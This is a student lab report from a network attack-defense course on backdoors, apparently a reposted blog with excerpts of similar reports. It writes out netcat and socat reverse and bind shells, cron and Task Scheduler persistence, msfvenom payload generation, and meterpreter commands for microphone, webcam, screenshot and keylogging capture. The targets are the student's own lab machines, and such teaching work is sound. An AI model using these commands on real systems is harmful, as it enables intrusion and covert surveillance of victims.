2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

实验内容

1.使用netcat获取主机操作Shell,cron启动
2.使用socat获取主机操作Shell, 任务计划启动
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

基础问题

  • 例举你能想到的一个后门进入到你系统中的可能方式?
    答:收到以银行或者学校名义给你发过来的虚假邮件,打开邮件并且下载邮件的附件之后,后门程序可能会进入你的计算机。
  • 例举你知道的后门如何启动起来(win及linux)的方式?
    答:通过修改注册表设置为开机自启动;进入挂马网站;下载一些有恶意程序绑定的软件。
  • Meterpreter有哪些给你映像深刻的功能?
    答:可以不用通过用户登录来访问计算机,并且随意进行开启摄像头,录制音频等操作。
  • 如何发现自己有系统有没有被安装后门?
    答:1.首先必须开启防火墙,而且防火墙对与某些危险操作的提示要仔细查看,不能疏忽。2.可以下载专业的杀毒软件(不要下载一些流氓软件如360),进行定期检查电脑。3.可以检测某些不常用的端口是否长时间开启,如果长时间开启说明电脑有一定的几率被植入了后门或者是病毒。

    实验过程

    1.使用netcat获取主机操作Shellcron启动

1.windows下获得一个linux shell

1.在Linux中使用ifconfig查看Linux的ip地址

2.在Windows中使用ipconfig查看本机ip地址

3.windows打开监听:ncat.exe -l -p 5235,Linux反弹连接win:nc 192.168.1.101 5235 -e /bin/sh,并且在Windows cmd下使用ls命令查看是否成功。

2.Linux 下获得Windows的cmd程序

1.Linux运行监听指令:nc -l -p 5235,Windows反弹连接Linux:ncat.exe -e cmd.exe 192.168.245.128 5235,在Linux shell下使用dir命令。

3.在Linux与Windows之间进行数据传送

1.Windows下监听端口:ncat.exe -l -p 5235,,Linux下连接到Windows的端口:ncat 192.168.1.101 5235,建立连接之后,就可以传输数据:

2.使用socat获取主机操作Shell, 任务计划启动

1.使用netcat获取主机操作Shell,cron启动

1.Windows中使用ncat.exe -l 5235监听5235端口
2.在linux中,使用crontab -e指令编辑一条定时任务,选择编辑器时选择3,在底行插入57 * * * * /bin/netcat 192.168.1.101 5235 -e /bin/sh(每个小时的第57分钟反向连接Windows的5235端口)

3.:wq保存退出配置即生效,可通过crontab -l查看:

4.在系统时间到57分钟,就会在Windows中监听的cmd中发现获得了Linux shell

2.使用socat获取主机操作Shell, 任务计划启动

1.win7系统中鼠标右击计算机:计算机管理->系统工具->任务计划程序->创建任务

2.常规中填写任务名称如:20165235

3.触发器-新建新建触发器,(按照图中步骤进行)

4.点击操作,将2操作所指的改为 启动程序.

5.导入socat.exe的路径,并添加参数:tcp-listen:5235 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口5235,同时把cmd.exe的stderr重定向到stdout上)

6.创建完成之后,按Windows+L快捷键锁定计算机,再次打开,运行之前创建的任务。

7.在Linux shell中输入socat - tcp:192.168.1.101:5235

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.245.128 LPORT=5235 -f exe > 20165235_backdoor.exe,生成后门程序20165235_backdoor.exe

2.在Windows中使用ncat.exe -lv5235 > 20165235_backdoor.exe

3.Linux中输入nc 192.168.1.101 5235 < 20165235_backdoor.exe。传输成功并且在Windows的ncat文件夹下查看后门程序。

4.再打开新的shell,并且使用msfconsole进入msf控制台:

5.输入use exploit/multi/handler
6.使用和生成后门程序时相同的payload:set payload windows/meterpreter/reverse_tcp
7.设置ip:set LHOST 192.168.245.128
9.设置端口:set LPORT 5235
10.使用exploit开始监听
11.在Windows cmd 中相应文件夹中执行:20165235_backdoor.exe,Linux获得Windows主机的连接,并且得到了远程控制的shell:

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.在以上的操作之上,使用record_mic可以截获一段音频:


2.使用webcam_snap可以使用摄像头拍照:

3.使用creenshot可以进行截屏:

4.使用keyscan_start 记录下击键的过程,使用keyscan_dump读取击键的记录:

实验中遇到的问题

1.错误一:在进行第一个实验时出现如下错误:


解决方法:在Linux使用ifconfig时出现很多地址,我很随意的填上去了一个,经过我仔细查看,将192.168.245.130写入运行成功。

2.错误:在使用crontab -e指令编辑一条定时任务时,发现win7端没有监听到Linux的shell

解决方法:因为在底部加入指令时没有将#取除掉。

实验总结与体会

通过本次实验我首先明白了什么是后门。(后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法)。同时也学会了后门的基本原理,按照学长学姐以及同学的博客的指导下完成实验,学会了使用多种后门工具,同时也学会了如何防范别人对计算机的后门植入。在以后的学习生活中要注意网上安全,留意恶意程序。本此实验也有一定的趣味性,在完成后门植入后会有些许的成就感。

原文地址:https://www.cnblogs.com/qy20165235/p/10581155.html

时间: 2024-11-05 20:28:14

2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践的相关文章

20145331魏澍琛《网络对抗》Exp2 后门原理与实践

20145331魏澍琛<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 上网时候弹出一个广告说你中奖了,或者你可以贷款10万元之类的,你一激动一点进去后门就进入你的系统了. (2)例举你知道的后门如何启动起来(win及linux)的方式? 比如下载一个游戏,下下来你会发现除了游戏快捷方式还有什么游戏大厅.游戏加速,或者什么最新的网页游戏(传奇狂暴版),你一好奇一点进去后门就启动了. (3)Meterpreter有哪些给你映像深刻的功能?

20145311王亦徐《网络对抗技术》后门原理与实践

20145311王亦徐<网络对抗技术>后门原理与实践 实验内容 使用netcat.socat获取主机操作Shell,并分别设置cron启动与任务计划启动 使用MSF meterpreter生成后门的可执行文件,并利用ncat或socat传送给主机,接着运行文件获取目标主机的音频.摄像头.击键记录.提权等内容 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 类似于摆渡木马的方式,将移动存储设备插入目标主机,backdoor自动拷贝到目标主机中(2)例举你知道的后门如何启动起

20145317彭垚《网络对抗》Exp2 后门原理与实践

20145317彭垚<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中: 例举你知道的后门如何启动起来(win及linux)的方式? Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的: 对后门程序进行伪装,例如重命名成某个游戏的开始程序之类的,诱骗用户点击启动: Linux下可以通过cron来启动. Meterpreter有哪些给你映像深刻的

20155338《网络对抗》Exp2 后门原理与实践

20155338<网络对抗>Exp2 后门原理与实践 一. 基础问题 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:游览网站中附带的广告或弹出的不正规软件. (2)例举你知道的后门如何启动起来(win及linux)的方式? 答:1.操作系统自带服务: 2.网络协议捆绑: 3.软件编写者制作: 4.漏洞攻击后放置: (3)Meterpreter有哪些给你映像深刻的功能 答:录屏,提升权限和录音. (4)如何发现自己有系统有没有被安装后门 答:用网络命令来看计算机所连接的设备有没有陌

20154329 《网络对抗技术》后门原理与实践

# Exp2后门原理与实践  ## 实验准备  1.知识储备  关于netcat:      又名nc,ncat.是一个底层工具,进行基本的TCP UDP数据收发.常被与其他工具结合使用,起到后门的作用.2.f附件准备  在课程主页下载附件ncat.exe和socat.exe  ## 实验过程### 任务一:使用netcat获取主机操作Shell,cron启动  #### 一.Win获得Linux Shell  ##### 1.Windows下,使用ipconfig指令查看本机ip为172.30

20154324 刘康权 《网络对抗》Exp2 后门原理与实践

一.实践目标与内容 1.学习内容 使用nc实现win,mac,Linux间的后门连接 meterpreter的应用 MSF POST 模块的应用 2.学习目标 学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能.通过亲手实践并了解这一事实,提高自己的安全意识 . 3.概念 后门就是不经过正常认证流程而访问系统的通道. netcat是一个底层工具,进行基本的TCP UDP数据收发.常被与其他工具结合使用,起到后门的作用. socat是ncat的增强版,它使用的格式是socat [op

20155321 《网络攻防》 Exp2 后门原理与实践

20155321 <网络攻防> Exp2 后门原理与实践 实验内容 例举你能想到的一个后门进入到你系统中的可能方式? 我觉得人们在平时上网的时候可能会无意识地点击到一些恶意的网站,这些网站本身可能被黑客植入了木马程序,这些程序可能会随着人们下载到本地而有机会进入到系统中. 例举你知道的后门如何启动起来(win及linux)的方式? 我所知道的是可能是黑客通过远程控制的办法是输入命令使后门程序启动起来. Meterpreter有哪些给你映像深刻的功能? 让我印象比较深刻的是可以通过后门控制摄像头

2018-2019-2 20165212《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165212<网络对抗技术>Exp2 后门原理与实践 1.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (5)可选加分内容:使用MSF生成she

2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践

2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践 后门的基本概念及实验内容 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 任务四